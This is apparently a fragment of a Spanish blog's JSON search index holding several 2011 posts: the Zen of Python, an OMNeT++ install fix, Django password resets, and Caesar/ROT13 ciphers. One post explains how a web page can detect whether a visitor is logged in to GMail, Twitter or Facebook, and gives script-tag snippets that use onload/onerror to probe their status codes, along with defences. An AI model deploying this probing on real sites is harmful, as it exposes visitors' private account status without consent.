keep in mind\u0026hellip;\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"zen\" loading=\"lazy\" src=\"/images/zen-300x225.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eAuthor: \u003cem\u003e\u003cem\u003e\u003ca href=\"http://www.flickr.com/photos/euart/282104427/\"\u003eeuart\u003c/a\u003e\u003c/em\u003e\u003c/em\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026gt;\u0026gt;\u0026gt; import this\nThe Zen of Python, by Tim Peters\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eBeautiful is better than ugly.\nExplicit is better than implicit.\nSimple is better than complex.\nComplex is better than complicated.\nFlat is better than nested.\nSparse is better than dense.\nReadability counts.\nSpecial cases aren\u0026#39;t special enough to break the rules.\nAlthough practicality beats purity.\nErrors should never pass silently.\nUnless explicitly silenced.\nIn the face of ambiguity, refuse the temptation to guess.\nThere should be one-- and preferably only one --obvious way to do it.\nAlthough that way may not be obvious at first unless you\u0026#39;re Dutch.\nNow is better than never.\nAlthough never is often better than _right_ now.\nIf the implementation is hard to explain, it\u0026#39;s a bad idea.\nIf the implementation is easy to explain, it may be a good idea.\nNamespaces are one honking great idea -- let\u0026#39;s do more of those!\n\u003c/code\u003e\u003c/pre\u003e","title":"Python Zen"},{"content":"function logged_in(id, txt) { document.getElementById(id).innerHTML = txt; } En el artículo original, de [Mark Cardwell][], se muestra como podemos saber si un visitante de nuestra página está conectado a diferentes servicios, como GMail, Facebook, Twitter, etc, aprovechando las diferencias de comportamiento que muestran estos servicios al acceder a enlaces concretos si el usuario está conectado o no. GMail ----- Conectado a GMail? __**...**__ Para comprobar si el visitante está conectado a GMail se intenta cargar una imagen de la siguiente manera: El src de la imagen hace referencia a la imagen del perfil de Mark, si no hemos iniciado sesión en GMail, la dirección del src no devolverá una imagen, sino que redireccionará a una página HTML. Con los atributos onload y onerror podremos distinguir si la imagen ha cargado o no, por lo que podremos saber si el usuario ha iniciado sesión o no. Esto parece que funciona en Firefox, Chrome, Opera, Safari y varias versiones de Internet Explorer.\nParece que si [en Firefox tenemos desmarcada][] la opción de \u0026ldquo;Aceptar cookies de terceros\u0026rdquo;, este ataque ya no funciona. Para comprobar el estado de esta opción vamos al menú Editar \u0026gt; Preferencias \u0026gt; Privacidad\nUsar configuración personalizada para el historial.\nTwitter Conectado a Twitter? \u0026hellip;\nEn el caso de Twitter, se utiliza una etiqueta script, por lo que el usuario deberá tener el Javascript habilitado para que funcione. En este caso, el src hace referencia a una página sólo visible si el usuario está conectado. En caso contrario, se produce una redirección. Aquí es donde entran los diferentes códigos de estado de HTTP. Facebook, Twitter o Digg proporcionan diferentes código de estado para algunas URLs dependiendo de si el usuario está conectado o no.\nEn Firefox, Safari y Chrome, la etiqueta script ejecuta el onload si el src devuelve un 200 OK, incluso si el contenido devuelto no es código Javascript. Si el código es 404, 403, 406 o 500, se ejecuta el onerror.\n\u0026lt;script type=\u0026#34;text/javascript\u0026#34; src=\u0026#34;https://twitter.com/settings/accounts/update?authenticity_token=xxx\u0026#34; onload=\u0026#34;logged_in(\u0026#39;lit\u0026#39;, \u0026#39;Si\u0026#39;)\u0026#34; onerror=\u0026#34;logged_in(\u0026#39;lit\u0026#39;, \u0026#39;No\u0026#39;)\u0026#34; async=\u0026#34;async\u0026#34;\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34; src=\u0026#34;https://twitter.com/settings/accounts/update?authenticity_token=xxx\u0026#34; onload=\u0026#34;not_logged_in_twitter()\u0026#34; onerror=\u0026#34;logged_in_twitter()\u0026#34; async=\u0026#34;async\u0026#34;\u0026gt; En este caso, Twitter redirige a la página de login si el usuario no está conectado, pero devuelve una página de error si el usuario está conectado, ya que la URL que hemos puesto corresponde a un formulario que debe ser enviado por POST y no por GET, además de que no conocemos el valor del campo authenticity_token.\nSi Twitter [está bloqueado][] y nos conectamos desde detrás de un proxy, es posible que el script nos diga que estamos conectados cuando en realidad no es así.\nFacebook Conectado a Facebook? \u0026hellip;\nEn el caso de Facebook también recuriremos a una etiqueta script, y en el src podemos poner la URL de un perfil que sólo sea visible si el usuario está conectado, por ejemplo el de Mike.\n\u0026lt;script type=\u0026#34;text/javascript\u0026#34; src=\u0026#34;https://www.facebook.com/imike3\u0026#34; onload=\u0026#34;logged_in(\u0026#39;lif\u0026#39;,\u0026#39;Sí\u0026#39;)\u0026#34; onerror=\u0026#34;logged_in(\u0026#39;lif\u0026#39;,\u0026#39;No\u0026#39;)\u0026#34; async=\u0026#34;async\u0026#34;\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34; src=\u0026#34;https://www.facebook.com/imike3\u0026#34; onload=\u0026#34;logged_in_to_facebook()\u0026#34; onerror=\u0026#34;not_logged_in_to_facebook()\u0026#34; async=\u0026#34;async\u0026#34; \u0026gt; En algunas ocasiones, parece que Facebook añade algún tipo de [comprobación de seguridad][], como añadir un _captcha_, antes de mostrar el perfil, o el error en caso de no estar conectado, por lo que el código de esa página previa es un `200 OK`, y mostraría al usuario conectado cuando en realidad puede no ser así. En los comentarios del artículo de Mike hacen referencia a un artículo anterior de [Jeremiah Grossman][]. Utiliza la misma técnica de la etiqueta `img` sólo que la imagen a la que hace referencia no es una imagen del perfil, sino una imagen que debía estar accesible una vez iniciada la sesión. Sin embargo, esa imagen ahora mismo no está disponible. Una cosa que me ha llamado la atención es que hay un ejemplo de cómo podemos crear un ataque más personalizado. Si hay una persona que sabemos que va a visitar la web, podemos comprobar si ha iniciado sesión en el panel de administración de Wordpress que sabemos que tiene instalado en algún dominio concreto: Aunque ya no funciona, ya que esa imagen ya no existe, y el resto de imágenes utilizadas en el administrador pueden ser visualizadas sin tener que haber iniciado sesión. Para protegernos de estos ataques contra nuestra privacidad podemos utilizar extensiones como [NoScript][] o [RequestPolicy][]. [Mark Cardwell]: http://grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Private_Information [en Firefox tenemos desmarcada]: http://grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Private_Information#comment1117-1-1-1-2 [está bloqueado]: http://grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Private_Information?reply_to=11113#comment11113 [comprobación de seguridad]: http://grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Private_Information#comment18 [Jeremiah Grossman]: http://jeremiahgrossman.blogspot.com/2008/03/login-detection-whose-problem-is-it.html [NoScript]: http://addons.mozilla.org/en-us/firefox/addon/noscript/ [RequestPolicy]: http://addons.mozilla.org/en-us/firefox/addon/requestpolicy/ ","permalink":"http://karpoke.ignaciocano.com/2011/02/22/abusando-del-codigo-de-estado-http/","summary":"\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-javascript\" data-lang=\"javascript\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003efunction\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003elogged_in\u003c/span\u003e(\u003cspan style=\"color:#a6e22e\"\u003eid\u003c/span\u003e, \u003cspan style=\"color:#a6e22e\"\u003etxt\u003c/span\u003e) {\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e   document.\u003cspan style=\"color:#a6e22e\"\u003egetElementById\u003c/span\u003e(\u003cspan style=\"color:#a6e22e\"\u003eid\u003c/span\u003e).\u003cspan style=\"color:#a6e22e\"\u003einnerHTML\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003etxt\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e}\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003eEn\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eel\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eartículo\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eoriginal\u003c/span\u003e, \u003cspan style=\"color:#a6e22e\"\u003ede\u003c/span\u003e [\u003cspan style=\"color:#a6e22e\"\u003eMark\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eCardwell\u003c/span\u003e][], \u003cspan style=\"color:#a6e22e\"\u003ese\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003emuestra\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ecomo\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003epodemos\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003esaber\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003esi\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eun\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003evisitante\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ede\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003enuestra\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003epágina\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eestá\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003econectado\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ea\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ediferentes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003eservicios\u003c/span\u003e, \u003cspan style=\"color:#a6e22e\"\u003ecomo\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eGMail\u003c/span\u003e, \u003cspan style=\"color:#a6e22e\"\u003eFacebook\u003c/span\u003e, \u003cspan style=\"color:#a6e22e\"\u003eTwitter\u003c/span\u003e, \u003cspan style=\"color:#a6e22e\"\u003eetc\u003c/span\u003e, \u003cspan style=\"color:#a6e22e\"\u003eaprovechando\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003elas\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003ediferencias\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ede\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ecomportamiento\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eque\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003emuestran\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eestos\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eservicios\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eal\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eacceder\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ea\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003eenlaces\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003econcretos\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003esi\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eel\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eusuario\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eestá\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003econectado\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eo\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eno\u003c/span\u003e.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003eGMail\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003e-----\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003eConectado\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ea\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eGMail\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e?\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003e__\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e**\u003c/span\u003e...\u003cspan style=\"color:#f92672\"\u003e**\u003c/span\u003e\u003cspan style=\"color:#a6e22e\"\u003e__\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003ePara\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ecomprobar\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003esi\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eel\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003evisitante\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eestá\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003econectado\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ea\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eGMail\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ese\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eintenta\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ecargar\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#a6e22e\"\u003euna\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eimagen\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ede\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003ela\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003esiguiente\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003emanera\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl \u003ccode\u003esrc\u003c/code\u003e de la imagen hace referencia a la imagen del perfil de Mark, si\nno hemos iniciado sesión en GMail, la dirección del \u003ccode\u003esrc\u003c/code\u003e no devolverá\nuna imagen, sino que redireccionará a una página HTML. Con los atributos\n\u003ccode\u003eonload\u003c/code\u003e y \u003ccode\u003eonerror\u003c/code\u003e podremos distinguir si la imagen ha cargado o no,\npor lo que podremos saber si el usuario ha iniciado sesión o no. Esto\nparece que funciona en Firefox, Chrome, Opera, Safari y varias versiones\nde Internet Explorer.\u003c/p\u003e","title":"Abusando del código de estado HTTP"},{"content":"OMNeT++ es un entorno de desarrollo modular y extensible desarrollado en C++, y gratuito pasa uso no comercial, especialmente pensado para construir simuladores de redes de eventos discretos en el sentido más amplio: redes de comunicaciones alámbricas, inalámbricas, redes de colas, etc. El soporte para dominios específicos tales como redes de sensores, redes inalámbricas ad-hoc, protocolos de Internet, modelado del rendimiento, etc, viene dado por proyectos desarrollados de forma independiente. OMNeT++ ofrece un IDE basado en eclipse, un entorno de ejecución gráfico y otras herramientas. Hay extensiones para simulación en tiempo real, emulación de redes, lenguages de programación alternativos (Java, C#), integración con bases de datos, etc.\nPara instalarlo en Ubuntu, nos bajamos el código fuente y lo descomprimimos, por ejemplo, en nuestro directorio personal:\n$ tar xvfz 2217-omnet-41-source--ide-tgz -C ~ Instalamos los paquetes necesarios:\n$ sudo aptitude install build-essential gcc g++ bison flex perl tcl-dev tk-dev blt libxml2-dev zlib1g-dev openjdk-6-jre doxygen graphviz openmpi-bin libopenmpi-dev libpcap-dev Ejecutamos las siguientes líneas y también las añadimos a nuestro ~/.bashrc:\n# omnet++4.1 export PATH=$PATH:$HOME/omnetpp-4.1/bin export TCL_LIBRARY=/usr/share/tcltk/tcl8.4 Ya podemos proceder con la instalación:\n$ ./configure Si al ejecutar este comando termina con el siguiente error:\nchecking for Tcl/Tk with CFLAGS=\u0026#34;-I/usr/include/tcl8.4 -fwritable-strings\u0026#34; LIBS=\u0026#34;-L/usr/share/tcltk -ltk8.4 -ltcl8.4\u0026#34;... no configure: error: Tcl/Tk not found, needed for all GUI parts. Version 8.4.0+ and devel package required. Check config.log for more info! se debe a que no encuentra las librerías Tcl/Tk. Para solucionarlo, deberemos modificar el archivo de configuración ~/omnet-4.1/configure.user para que las encuentre. La solución del manual de instalación no me ha ido del todo bien dado que las librerías Tcl/Tk en Ubuntu no se encuentran por defecto donde el programa espera. Así que editamos ese fichero, y allí donde nos sugiere que modifiquemos estas variables, añadimos las siguientes líneas:\nTK_CFLAGS=\u0026#34;-I/usr/include/tcl8.4 -I/usr/include/tk8.4\u0026#34; TK_LIBS=\u0026#34;-L/usr/share/tcltk/tcl8.4 -L/usr/share/tcltk/tk8.4 -ltk8.4 -ltcl8.4\u0026#34; Actualizado el 20 de junio de 2012 La variable TK_CFLAGS debe contener los directorios donde se encuentran los ficheros tcl.h y tk.h. Si se encuentran en directorios distintos, se debe incluir ambos, precedidos del argumento -I.\nLa variable TK_LIBS debe contener los directorios donde se encuentran las librerías cuyo nombre comienza por libtcl y libtk, por ejemplo, libtcl84.so, libtk8.4.a, etc. El argumento -l contiene el nombre de las librerías (que debe coincidir con el nombre de los ficheros anteriores, quitan el prefijo lib y los sufijos .so y .a). Podría ser necesario enlazar con las librerías X11, por lo que se debería añadir -lX11, aunque esto último no me hizo falta.\nAhora ya podemos ejecutar el comando:\n$ ./configure Y compilar con el make, pero aprovechando que tengo un procesador con dos núcleos y que el programa puede optimizarse para el número de núcleos, le pasaremos el argumento -j:\n$ make -j2 Si modificamos algún parámetro de configure.user, deberemos hacer una limpieza y volver a compilar:\n$ make cleanall $ make -j2 Si queremos ejecutar el programa sin entorno gráfico, por ejemplo, si lo vamos a utilizar a través de una sesión remota por ssh, y queremos decirle que que no tenga en cuenta las librerías Tcl/Tk a la hora de compilar, usaremos el siguiente comando:\n$ NO_TCL=yes ./configure Podemos ver y probar algunos de los ejemplos que trae el programa ejecutando:\n$ ~/omnetpp-4.1/samples/rundemo ","permalink":"http://karpoke.ignaciocano.com/2011/02/21/solucionado-el-error-tcltk-not-found-al-instalar-omnet-en-ubuntu/","summary":"\u003cp\u003e\u003ca href=\"http://www.omnetpp.org/\"\u003eOMNeT++\u003c/a\u003e es un entorno de desarrollo modular y extensible\ndesarrollado en C++, y gratuito pasa uso no comercial, especialmente\npensado para construir simuladores de redes de eventos discretos en el\nsentido más amplio: redes de comunicaciones alámbricas, inalámbricas,\nredes de colas, etc. El soporte para dominios específicos tales como\nredes de sensores, redes inalámbricas \u003cem\u003ead-hoc\u003c/em\u003e, protocolos de Internet,\nmodelado del rendimiento, etc, viene dado por proyectos desarrollados de\nforma independiente. OMNeT++ ofrece un IDE basado en eclipse, un entorno\nde ejecución gráfico y otras herramientas. Hay extensiones para\nsimulación en tiempo real, emulación de redes, lenguages de programación\nalternativos (Java, C#), integración con bases de datos, etc.\u003c/p\u003e","title":"Solucionado el error \"Tcl/Tk not found\" al instalar OMNeT++ en Ubuntu"},{"content":"A partir de Django 1.2 se ha añadido el comando manage.py changepassword.\n$ ./manage.py changepassword [\u0026#39;username\u0026#39;] Si no proporcionamos un nombre de usuario se intentará cambiar el nombre de usuario que concuerde con el del usuario que ha iniciado sesión. Este comando nos ahorra escribir lo siguiente:\n\u0026gt;\u0026gt;\u0026gt; from django.contrib.auth.models import User \u0026gt;\u0026gt;\u0026gt; u = User.objects.get(username__exact=\u0026#39;john\u0026#39;) \u0026gt;\u0026gt;\u0026gt; u.set_password(\u0026#39;new password\u0026#39;) \u0026gt;\u0026gt;\u0026gt; u.save() El usuario administrador es el primer usuario del sistema por lo que podemos escribir:\n\u0026gt;\u0026gt;\u0026gt; from django.contrib.auth.models import User \u0026gt;\u0026gt;\u0026gt; u = User.objects.get(pk=1) \u0026gt;\u0026gt;\u0026gt; u.is_superuser True \u0026gt;\u0026gt;\u0026gt; u.username \u0026#39;bofh\u0026#39; \u0026gt;\u0026gt;\u0026gt; u.set_password(\u0026#39;new password\u0026#39;) \u0026gt;\u0026gt;\u0026gt; u.save() Es importante usar set_password y no asignar la contraseña directamente, ya que la contraseña se guarda con un formato que set_password, y también check_password, gestiona correctamente. La contraseña se guarda junto con el tipo de hash y la sal, una cadena aleatoria utilizada junto con la contraseña para crear el hash. Por ejemplo,\n`sha1$a1976$a36cc8cbf81742a8fb52e221aaeab48ed7f58ab4` ","permalink":"http://karpoke.ignaciocano.com/2011/02/16/cambiar-la-contrasena-de-administrador-en-django-1-2/","summary":"\u003cp\u003eA partir de \u003ca href=\"https://pythonhosted.org/django_simple_feedback/topics/auth.html#changing-passwords\"\u003eDjango 1.2\u003c/a\u003e se ha añadido el comando\n\u003ccode\u003emanage.py changepassword\u003c/code\u003e.\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ ./manage.py changepassword [\u0026#39;username\u0026#39;]\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi no proporcionamos un nombre de usuario se intentará cambiar el nombre\nde usuario que concuerde con el del usuario que ha iniciado sesión. Este\ncomando nos ahorra escribir lo siguiente:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026gt;\u0026gt;\u0026gt; from django.contrib.auth.models import User\n\u0026gt;\u0026gt;\u0026gt; u = User.objects.get(username__exact=\u0026#39;john\u0026#39;)\n\u0026gt;\u0026gt;\u0026gt; u.set_password(\u0026#39;new password\u0026#39;)\n\u0026gt;\u0026gt;\u0026gt; u.save()\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Django Admin Login\" loading=\"lazy\" src=\"/images/django-admin-login-300x171.png\"\u003e\u003c/p\u003e\n\u003cp\u003eEl usuario administrador es el primer usuario del sistema por lo que\npodemos escribir:\u003c/p\u003e","title":"Cambiar la contraseña de administrador en Django 1.2"},{"content":"Después de ver cómo se descifra al César en Python, me he encontrado con un par de maneras elegantes de hacerlo desde Bash.\nCifrado César Con tr:\n$ echo \u0026#34;lorem ipsum dolor sit amet\u0026#34; | tr \u0026#39;a-z\u0026#39; \u0026#39;d-za-c\u0026#39; oruhp lsvxp groru vlw dphw $ echo \u0026#34;oruhp lsvxp groru vlw dphw\u0026#34; | tr \u0026#39;d-za-c\u0026#39; \u0026#39;a-z\u0026#39; lorem ipsum dolor sit amet Con sed también se puede conseguir, aunque es bastante más laborioso:\n$ echo \u0026#34;lorem ipsum dolor sit amet\u0026#34; | sed -e \u0026#34;y/abcdefghijklmnopqrstuvwxyz/defghijklmnopqrstuvwxyzabc/\u0026#34; oruhp lsvxp groru vlw dphw $ echo \u0026#34;oruhp lsvxp groru vlw dphw\u0026#34; | sed -e \u0026#34;y/abcdefghijklmnopqrstuvwxyz/defghijklmnopqrstuvwxyzabc/\u0026#34; lorem ipsum dolor sit amet ROT13 Con tr:\n$ echo \u0026#34;lorem ipsum dolor sit amet\u0026#34; | tr \u0026#39;a-zA-Z\u0026#39; \u0026#39;n-za-mN-ZA-M\u0026#39; yberz vcfhz qbybe fvg nzrg $ echo \u0026#34;yberz vcfhz qbybe fvg nzrg\u0026#34; | tr \u0026#39;n-za-mN-ZA-M\u0026#39; \u0026#39;a-zA-Z\u0026#39; lorem ipsum dolor sit amet Por supuesto, con rot13, incluido en el paquete bsdgames:\n$ rot13 \u0026#34;lorem ipsum dolor sit amet\u0026#34; yberz vcfhz qbybe fvg nzrg $ rot13 \u0026#34;yberz vcfhz qbybe fvg nzrg\u0026#34; lorem ipsum dolor sit amet ROT47 Con tr:\n$ echo \u0026#34;lorem ipsum dolor sit amet\u0026#34; | tr \u0026#39;!-~\u0026#39; \u0026#39;P-~!-O\u0026#39; =@C6\u0026gt; :ADF\u0026gt; 5@=@C D:E 2\u0026gt;6E $ echo \u0026#34;=@C6\u0026gt; :ADF\u0026gt; 5@=@C D:E 2\u0026gt;6E\u0026#34; | tr \u0026#39;P-~!-O\u0026#39; \u0026#39;!-~\u0026#39; lorem ipsum dolor sit amet ","permalink":"http://karpoke.ignaciocano.com/2011/02/16/descifrando-al-cesar-en-bash/","summary":"\u003cp\u003eDespués de ver cómo se \u003ca href=\"/2011/02/16/descifrando-al-cesar-en-python/\"\u003edescifra al César en Python\u003c/a\u003e, me he encontrado\ncon un par de maneras elegantes de hacerlo desde Bash.\u003c/p\u003e\n\u003ch2 id=\"cifrado-césar\"\u003eCifrado César\u003c/h2\u003e\n\u003cp\u003eCon \u003ccode\u003etr\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ echo \u0026#34;lorem ipsum dolor sit amet\u0026#34; | tr \u0026#39;a-z\u0026#39; \u0026#39;d-za-c\u0026#39;\noruhp lsvxp groru vlw dphw\n$ echo \u0026#34;oruhp lsvxp groru vlw dphw\u0026#34; | tr \u0026#39;d-za-c\u0026#39; \u0026#39;a-z\u0026#39;\nlorem ipsum dolor sit amet\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCon \u003ccode\u003esed\u003c/code\u003e también se puede conseguir, aunque es bastante más laborioso:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ echo \u0026#34;lorem ipsum dolor sit amet\u0026#34; | sed -e \u0026#34;y/abcdefghijklmnopqrstuvwxyz/defghijklmnopqrstuvwxyzabc/\u0026#34;\noruhp lsvxp groru vlw dphw\n$ echo \u0026#34;oruhp lsvxp groru vlw dphw\u0026#34; | sed -e \u0026#34;y/abcdefghijklmnopqrstuvwxyz/defghijklmnopqrstuvwxyzabc/\u0026#34;\nlorem ipsum dolor sit amet\n\u003c/code\u003e\u003c/pre\u003e\u003ch2 id=\"rot13\"\u003eROT13\u003c/h2\u003e\n\u003cp\u003eCon \u003ccode\u003etr\u003c/code\u003e:\u003c/p\u003e","title":"Descifrando al César en Bash"},{"content":"Si lo que pretendemos es, dada una cadena, sustituir una serie de caracteres por otra, en Python es tan sencillo como pasarle al método maketrans una cadena con los caracteres que queremos cambiar y otra con los caracteres a utilizar en su lugar. Ambas cadenas deberán tener la misma longitud. Este método devuelve una tabla de traducción, un objeto susceptible de ser usado por el método translate el cual se aplica sobre un string, como veremos.\nCifrado César En pocas palabras, el cifrado César se basa en sustituir cada letra de un mensaje, una cadena de texto, por la que le sigue 3 puestos más allá en el alfabeto, es decir, la A por la D, la B por la E, y así sucesivamente, hasta las tres últimas letras que se cambiarán por las tres primeras letras, respectivamente. Para descifrar un mensaje cifrado con este sistema sólo tenemos que llevar a cabo el proceso inverso, cambiar la A por la X, la B por la Y, la C por la Z, y a partir de la D por la letra 3 puestos antes en el alfabeto. No tiene en cuenta mayúsculas o minúsculas, por lo que por ahora no nos preocuparemos de eso.\nfrom string import maketrans sfrom = \u0026#34;abcdefghijklmnopqrstuvwxyz\u0026#34; sto = \u0026#34;xyzabcdefghijklmnopqrstuvw\u0026#34; trantab = maketrans(sfrom, sto) \u0026#34;sbwkrq\u0026#34;.translate(trantab) Con esto en mente, podemos escribir un método que nos permita cualquier tipo de traslación, tanto en un sentido como en otro:\nfrom string import maketrans, translate, ascii_lowercase as al def caesar(text, offset=3): return translate(text, maketrans(al, al[offset:] + al[:offset])) \u0026gt;\u0026gt;\u0026gt; caesar(\u0026#34;python\u0026#34;) \u0026#39;sbwkrq\u0026#39; \u0026gt;\u0026gt;\u0026gt; caesar(\u0026#34;sbwkrq\u0026#34;, -3) \u0026#39;python\u0026#39; \u0026gt;\u0026gt;\u0026gt; caesar(\u0026#34;python\u0026#34;, 13) \u0026#39;clguba\u0026#39; Los métodos de cifrado basados en traslaciones hace mucho tiempo que quedaron obsoletos, ya que es sencillo obtener una distribución de las frecuencias de letras de un texto cifrado y compararlas con la frecuencia de aparición de letras para un idioma concreto.\nROT13 RTO13 está basado en el cifrado César, sólo que en lugar de 3 posiciones, hace la sustitución por el carácter que está 13 puestos hacia adelante en el alfabeto, conservando, además, si es mayúscula o minúscula.\nfrom string import maketrans, translate, ascii_lowercase as al, ascii_uppercase as au def rot13(text, offset=13): sfrom = au + al sto = au[offset:] + au[:offset] + al[offset:] + al[:offset] return translate(text, maketrans(sfrom, sto)) \u0026gt;\u0026gt;\u0026gt; rot13(\u0026#34;ABCXYZabcxyz\u0026#34;) \u0026#39;NOPKLMnopklm\u0026#39; ROT47 Este es un ROT13 